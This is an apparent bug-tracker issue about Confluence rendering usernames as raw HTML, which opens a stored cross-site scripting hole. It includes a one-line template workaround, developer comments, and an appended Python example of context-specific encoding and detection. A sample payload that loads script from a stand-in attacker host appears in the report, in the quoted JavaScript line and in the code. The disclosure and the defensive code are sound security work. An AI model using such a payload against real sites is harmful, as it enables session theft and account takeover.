When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.

Two places I've spotted the raw HTML so far:

• Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
• When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:

    if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";

[CONFSERVER-7615] XSS bug: usernames not HTML-encoded in all places

Chris Kiehl added a comment - - edited

If you are unable to upgrade to 2.9.1 you can fix this issue in your installation by editing one line in the file confluence/template/includes/menu-macros.vm which resides in your Confluence installation directory:

Change

    #menuMacros_renderMenu("user-menu-link", $user.fullName, "user", "system.user")

to

    #menuMacros_renderMenu("user-menu-link", $generalUtil.htmlEncode($user.fullName), "user", "system.user")
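The two output contexts named in the report (the Show All Users list, which is HTML, and the string literal inside togglePermissions(), which is JavaScript) together with the HTML encoding the workaround above applies through $generalUtil.htmlEncode, as an added Python example. This is not Confluence code and not a patch from this issue: the row and script fragments are minimal stand-ins for the real templates, the username allow-list is a constructed policy, and the helper names (encode_for_html, encode_for_js_string, count_script_tags, breaks_out_of_script, is_acceptable_username) are hypothetical.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample: the username from the bug report (the domain is the report's made-up one).
REPORTED_USERNAME = '<script src=http://drevil.com/xss>fred</script>'


def encode_for_html(value: str) -> str:
    """Encode for an HTML text or attribute context.

    Same idea as the menu-macros.vm workaround's $generalUtil.htmlEncode: the HTML
    metacharacters become entities, so the browser shows the username as text.
    """
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Encode for a JavaScript string literal inside a <script> block.

    HTML encoding is the wrong encoder here: the HTML parser ends a <script>
    element at the first '</script>' it sees, whatever the JS quoting around it.
    Every character outside [A-Za-z0-9] becomes \\xHH or \\uHHHH, so neither a
    closing quote nor '</' can survive in the output.
    """
    out = []
    for ch in value:
        code = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif code < 0x100:
            out.append(f'\\x{code:02x}')
        else:
            out.append(f'\\u{code:04x}')
    return ''.join(out)


# Hypothetical stand-ins for the two places the report mentions.
def render_user_row_unescaped(username: str) -> str:
    """Vulnerable form: username dropped straight into the user list."""
    return f'<td class="username">{username}</td>'


def render_user_row(username: str) -> str:
    """Fixed form for the HTML context."""
    return f'<td class="username">{encode_for_html(username)}</td>'


def render_toggle_permissions_unescaped(username: str) -> str:
    """Vulnerable form: the script fragment quoted in the report."""
    return f'if ($(\'edit-personal\').checked) $(\'editPermission\').value = "{username}";'


def render_toggle_permissions(username: str) -> str:
    """Fixed form: the value encoded for the JS string context."""
    return f'if ($(\'edit-personal\').checked) $(\'editPermission\').value = "{encode_for_js_string(username)}";'


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the browser would actually execute."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.script_tags += 1


def count_script_tags(rendered_html: str) -> int:
    """Check for the HTML context: how many live <script> elements did the output contain?"""
    parser = _ScriptCounter()
    parser.feed(rendered_html)
    parser.close()
    return parser.script_tags


def breaks_out_of_script(script_body: str) -> bool:
    """Check for the JS context: would this script body end the <script> element early?"""
    return '</script' in script_body.lower()


# Constructed allow-list (not Confluence's rule): defence in depth at signup, in the spirit of
# the later comment that signup with such names was closed off. It does not replace encoding.
_USERNAME_ALLOWED = re.compile(r'[A-Za-z0-9._@-]{1,64}')


def is_acceptable_username(username: str) -> bool:
    return _USERNAME_ALLOWED.fullmatch(username) is not None


if __name__ == '__main__':
    for label, fn in (('user list, unescaped', render_user_row_unescaped),
                      ('user list, encoded', render_user_row)):
        out = fn(REPORTED_USERNAME)
        print(f'{label}: script tags={count_script_tags(out)}  {out}')
    for label, fn in (('togglePermissions, unescaped', render_toggle_permissions_unescaped),
                      ('togglePermissions, encoded', render_toggle_permissions)):
        out = fn(REPORTED_USERNAME)
        print(f'{label}: breaks out={breaks_out_of_script(out)}  {out}')
    print('signup accepted:', is_acceptable_username(REPORTED_USERNAME))
```

The point the two encoders make is that each output context needs its own encoder: the template fix above is right for the user list, but a value landing inside a JavaScript string needs JS-string escaping, and the allow-list at signup only reduces how much reaches either place.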

Chris Kiehl added a comment - - edited

Those two cases are already fixed, but while looking for those two I found another place where data is written unescaped.

Samuel Le Berrigaud added a comment -

While usernames are still not encoded in all places, the signup is no longer possible, see CONF-7497

ckiehl Chris Kiehl
7ee5c68a815f Jeff Turner